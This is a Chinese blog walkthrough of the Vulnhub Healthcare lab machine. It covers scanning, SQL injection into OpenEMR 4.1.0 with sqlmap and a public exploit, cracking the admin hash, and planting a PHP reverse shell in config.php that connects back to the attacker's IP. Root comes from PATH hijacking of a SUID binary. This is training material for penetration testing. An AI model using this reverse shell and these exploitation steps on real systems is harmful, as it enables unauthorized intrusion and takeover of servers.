Vulnhub Healthcare靶机教程

已于 2023-10-30 17:52:27 修改
阅读量164 收藏
点赞数
分类专栏: 靶机 渗透 提权 文章标签: linux 网络安全 服务器 web安全 1024程序员节
于 2023-10-10 13:28:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/133712401
版权
渗透 同时被 3 个专栏收录
20 篇文章 0 订阅
订阅专栏
靶机
7 篇文章 0 订阅
订阅专栏
提权
4 篇文章 0 订阅
订阅专栏

Healthcare靶机教程

要求

准备一台kail和Healthcare靶机
虚拟机网络为NAT模式

目标信息

难度等级:中等
获得两个标志:user.txt和root.txt。

渗透

我们启动靶机进入登录界面
在这里插入图片描述
这个就是我们要渗透的靶机

信息收集

  1. 启动靶机后进入kali使用nmap工具进行端口扫描靶机所在的网段 nmap -A 10.4.7.0/24
    在这里插入图片描述

  2. 在这里获得了目标机的ip地址为10.4.7.5,以及其开放的端口号为 21 、80,所对应的服务是http和ftp
    在这里插入图片描述

  3. 既然开放着21端口那我们尝试ftp匿名登录
    在这里插入图片描述

  4. 发现该ftp服务未开启匿名登录
    在这里插入图片描述

  5. 那我们从网站入手在浏览器输入10.4.7.5回车进入网站
    在这里插入图片描述

  6. 可以看到一个输入框貌似可以输入邮箱那我们输入邮箱进行尝试
    在这里插入图片描述
    可以看到并没有什么反应但是看到usr上的网址是有变化,尝试sql注入

  7. 输入单引号闭合但是没什么反应

在这里插入图片描述
也找不到其他线索了
8. 进入返回kali对网站的敏感目录进行扫描 我这里使用的是gobuster工具
gobuster dir -r -u http://10.4.7.5/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x .html,.php
dir 为传统的目录爆破模式,-r 为重定向 -u指定网址 -w 字典位置 -x为扫描类型
在这里插入图片描述
9.在扫描过程中有被爆出来的敏感目录我们进行排查看看是否有有用的信息
因为.html /index.html都为网址主页就不查看了
查看http://10.4.7.5/favicon发现是一个图标
在这里插入图片描述
再来查看http://10.4.7.5/robots
在这里插入图片描述
在里面我们发现有提示几个目录分别试试
查看过后发现基本上都是找不到对象以及目录只能在本地访问

在这里插入图片描述
等gobuster扫完之后发现又扫出一个敏感目录
在这里插入图片描述
9. 我们输入网址进入网站http://10.4.7.5/openemr在这里插入图片描述
发现是一个登录界面
10. 输入弱口令进行登录admin:admin
在这里插入图片描述
提示账号密码无效,看到=也尝试sql注入也没有成功
然后上网搜索了一下OpenEMR v4.1.0这个版本发现是有漏洞的
在这里插入图片描述
这是一个sql注入漏洞观察这个源代码找到了它的注入点在这里插入图片描述
11. 验证一下这个版本是否存在这个漏洞使用sqlmap进行数据库枚举库
sqlmap -u "http://10.4.7.5/openemr/interface/login/validateUser.php?u=" -dbs
-u参数为指定网址 -dbs 为枚举库在这里插入图片描述
可以看到数据库已经被枚举出来了说明是有这个漏洞我们可以直接继续枚举或者下载漏洞进行使用
在经过0.1s的内心挣扎中我果断选择省事的漏洞OpenEMR v4.1.0
12. 下载完成后复制到kali里
在这里插入图片描述
这是一个python文件漏洞编号是49742vim查看一下
在这里插入图片描述
13. 将程序里的网址改为目标机的IP 按i键是插入 esc键是退出插入 shift+: 输入wq保存
在这里插入图片描述
14. 运行python文件python3 49742.py
在这里插入图片描述
这里比较慢等待枚举账号密码
15.枚举出来账号和密码但是是md5加密

在这里插入图片描述
16.将密钥复制 新建一个终端输入vim md5.txt
在这里插入图片描述
进入之后按CTRL+shift+v粘贴然后wq保存
在这里插入图片描述
17.使用John命令进行破解密钥 john md5.txt在这里插入图片描述
破解完成账号密码是admin:ackbar
18.返回网站进行登录在这里插入图片描述
登录成功继续信息收集
19.经过查找发现有一个可以上传文件的地方
在这里插入图片描述
博主英语不好就使用了翻译
我们试着上传一个php文件里面有我写好的大马文件

<?php
$ip='10.4.7.3';
$port=10002;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>

在这里插入图片描述
进行上传
在这里插入图片描述
上传好后使用路径进行访问
在这里插入图片描述
大概猜测路径为http://10.4.7.5/openemr/sites/default/bill.php
访问之后发现没有用
在这里插入图片描述
但是在这里有一个config.php的选项
在这里插入图片描述
尝试了一下这个居然可以访问
在这里插入图片描述
那我们将反弹shell写在这个里面保存!!! 千万不要删除原文件在这里插入图片描述重新访问之后发现弹进来了在这里插入图片描述

提权

反shell进来以后给加个壳python -c "import pty;pty.spawn('/bin/bash')"方便我们操作
在这里插入图片描述
我们进入home目录下寻找线索在almirant用户的目录下发现了第一枚旗子
在这里插入图片描述
在查找已经找不到扫描信息了
我们查找一下二进制文件看是否存在着特殊权限位的文件可以让我们提权find / -perm -u=s -type f 2>/dev/null
在这里插入图片描述
我们看一下这文件是否能执行
在这里插入图片描述
发现可以执行

可以看到这是一个健康检查文件我们用strings命令查看一下能够打印出来的字符
在这里插入图片描述
可以看到下面的的内容是有被执行的 并且这个文件所有者为root这样的我们创建一个ifconfig文件里面写上shell想办法让他执行我们创建的文件就可以获得root权限了
我们进入/tmp目录下因为tmp目录所有用户都可以在这里创建文件 echo '/bin/bash' > ifconfig 因为有字符所有加’’ 防止出错

在这里插入图片描述
我们查看一下是否写入
在这里插入图片描述
接下来就让系统优先执行这里用到一个环境变量提权
环境变量提权具体意思是什么呢
就是使用export设置一个临时的环境变量
那么系统在执行文件的过程中没有加绝对路径那么就会默认去找环境变量里所设置的路径
这个路径下的文件又恰好是我们写的 这样就会执行文件的时候就会找到我们的文件执行里面的命令

为了保证文件可以顺利执行我们给文件把权限拉到最高 chmod 777 ifconfig

在这里插入图片描述
接下来设置临时环境变量 export PATH=/tmp:$PATH
在这里插入图片描述
我们再次执行这个健康检查文件/usr/bin/healthcheck
在这里插入图片描述
发现我们已经是root用户了
cd 到root的家目录下cd /root
在这里插入图片描述
less root.txt 拿下最后一面旗子
在这里插入图片描述

总结

这个靶机很基础没有什么难度,重要的是掌握工具的使用以及变量提权的方法

抠脚大汉在网络
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Machine Learning in Healthcare Informatics
02-06
Keywords:Algorithm Design,Computational Clinical Decision Support,Data Mining,Healthcare Informatics,Intelligent Systems,Machine Learning
Healthcare医疗行业解决方案
06-01
介绍了摩托罗拉在移动医疗解决方案以及相关产品,了解解决方案的参考资料。
看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1
Aluxian_的博客
10-01 935
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagIntermediate(中级的)1.信息收集工具得使用2.环境变量提权,这个靶机比较简单没啥新得知识点!3.sqlmap工具的使用搜索利用反弹shell的使用🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!
Vulnhub靶机 Healthcare
菜浪马废的博客
09-17 739
没有可利用的漏洞 扫一下目录 有注入漏洞 sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= --dbs sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr --tables sqlmap -u http://192.168.80.142/openemr//interf.
Healthcare靶机wp
m0_52496313的博客
08-18 266
Healthcare靶机wp
healthcare靶机(openEMR管理系统SQL注入漏洞)
m0_66299232的博客
11-25 514
6.在files,有一个配置文件可以更改,那么就可以把php-reverse-shell.php(github里有)的代码复制过来。pty.spawn('/bin/bash')" //反弹交互式shell。find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件。2.查看49742.py是一个python脚本,可以利用,只需更改ip 用python3来执行。nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务。
Healthcare靶机总结
qq_45301512的博客
01-12 412
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到,靶机开放了21端口和80端口21端口为ftp的端口,一般遇到这种,就可以考虑ftp的匿名登录,我们可以试一下用户名anonymous,没有密码,这里登录失败那么只能根据80端口,打开网站,然后去网站入手打开网站先试试功能点,看能否找到可利用的漏洞,这里没发现漏洞点然后可以在源代码里面找找看有没有提示,这里也没有。
bmi.rar_BMI_NOO_healthcare _purpose
09-15
this paper suggestion are very nice for purpose of working with data mining in healthcare with body mass index
Data-for-Life-Wearable-Technology_healthcare_SelfCare_
09-30
Data-for-Life-Wearable-Technology-and-the-Design-of-Self-Care
healthcare
03-17
哈里斯堡大学HCIN / ISEM 541的材料-医疗保健系统
Healthcare渗透思路:
weixin_54105551的博客
08-04 535
本章为Healthcare渗透思路,这个只是个人的渗透思路,写的不好,勿喷,刚学习网络安全不久,最后谢谢大家的观看。
CentOS 7基础操作05_Linux查看及切换目录
IT_zhangsan
05-31 783
pwd命令用于显示用户当前所在的工作目录位置,工作目录是用户操作文件或其他子目录的默认位置起点。使用pwd命令可以不添加任何选项或参数。
Linux - 磁盘的分区和挂载
weixin_45735487的博客
05-27 741
逻辑分区只能在拓展分区上划分,编号5-15。拓展分区编号1-4,拓展分区不能格式化。rescue 恢复分区,对于误删的分区进行恢复,语法: rescue 起始 结束。rm 删除分区,后接要删除的分区编号。(L) 在主分区和拓展分区划分完之后,默认提示划分逻辑分区。n 进行磁盘分区,这里会默认MBR标签。(p) msdos下,会默认选择先划分主分区。
【Linux】升级GCC(版本9.3),补充:binutils
yannan20190313的博客
05-27 793
【Linux】升级GCC(版本9.3),补充:binutils
Linux echo命令(在终端输出文本)
Dontla的博客
05-22 873
echo是Linux和Unix系统中常用的一个命令行工具,主要用于在终端输出文本。该命令非常简单,但是它在脚本编程和日常系统管理中扮演着重要的角色。
【Linux】中常见的重要指令(下)以及重要的几个热键
2401_84568462的博客
05-27 1181
find指令查找的文件不能当前路径下(可以这样理解:如果要查找当前路径下可以使用ls指令,就不麻烦find指令了),必须查找当前路径下的目录里的文件。1.能被打包压缩的一定是由多个文件组成的,打包压缩后将文件变为一个整体,在传递给其他用户时不容易缺失。.tar打包后缀 .gz压缩后缀 XXX.tar.gz ----->XXX.tgz。功能:在系统特定的路径下查找,及可以找到可执行程序,有可以找到手册,安装包和压缩包等。命令在目录结构中搜索文件,并执行指定的操作。功能:在指令路径下搜索指令文件。
Linux中部署MinIO
最新发布
weixin_42691754的博客
05-31 219
以上步骤会启动一个MinIO服务器实例,你可以通过浏览器访问http://your-server-ip:9000来使用MinIO的管理界面。
Linux 使用unzip解压时报错End-of-central-directory signature not found
weixin_44162814的博客
05-31 233
应该是 unzip 设置了这个解压的文件大小限制了
Big Data Analytics for Healthcare
07-28
以下是一些关于在医疗领域中应用大数据分析的论文: 1. "Big Data Analytics in Healthcare: Promise and Potential" by Rajeev Baliyan, et al. - 这篇论文探讨了在医疗领域中应用大数据分析的潜力和前景,包括数据收集、处理、分析和应用的方法和技术。 2. "Big Data Analytics in Healthcare: A Review" by Mirela-Catalina Smeureanu, et al. - 这篇综述性论文回顾了在医疗领域中利用大数据分析的研究和实践,包括临床决策支持、疾病预测、药物发现和个性化医疗等方面的应用。 3. "Big Data Analytics for Healthcare: A Systematic Literature Review" by Amin Jalali, et al. - 这篇论文通过系统性文献回顾的方法总结了在医疗领域中应用大数据分析的研究成果,涵盖了不同的应用场景、技术和方法。 4. "Big Data Analytics in Healthcare: Challenges and Opportunities" by Shuchismita Sengupta, et al. - 这篇论文讨论了在医疗领域中应用大数据分析面临的挑战和机遇,包括数据隐私、数据质量、算法选择和可解释性等方面的问题。 这些论文提供了关于在医疗领域中应用大数据分析的重要研究和实践成果,可作为进一步学习和探索的起点。请注意,在阅读和引用这些论文时,请遵循学术道德和版权规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值